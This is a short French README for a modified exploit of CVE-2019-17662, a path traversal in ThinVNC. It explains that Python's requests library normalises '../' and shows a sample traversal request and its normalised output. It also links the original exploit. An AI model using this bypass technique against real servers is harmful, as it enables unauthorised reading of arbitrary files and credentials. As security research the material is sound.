
Exploit pour CVE-2019-17662, une vulnérabilité de path traversal dans ThinVNC, démontrant le contournement de la normalisation d'URL pour accéder à des fichiers arbitraires sur le serveur cible.
Code CVE modifié
Utilisation de Requêtes préparées, car dans le module python3 requests, il normalise le ../ dans l'URL, comme ceci :
Pour le code :
r = requests.get("http://123.123.123.123/../../../../../../test")
print(str(r.status_code))
Résultat :
GET /test HTTP/1.1
Host: 123.123.123.123
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
Exploit original :
https://www.exploit-db.com/exploits/47519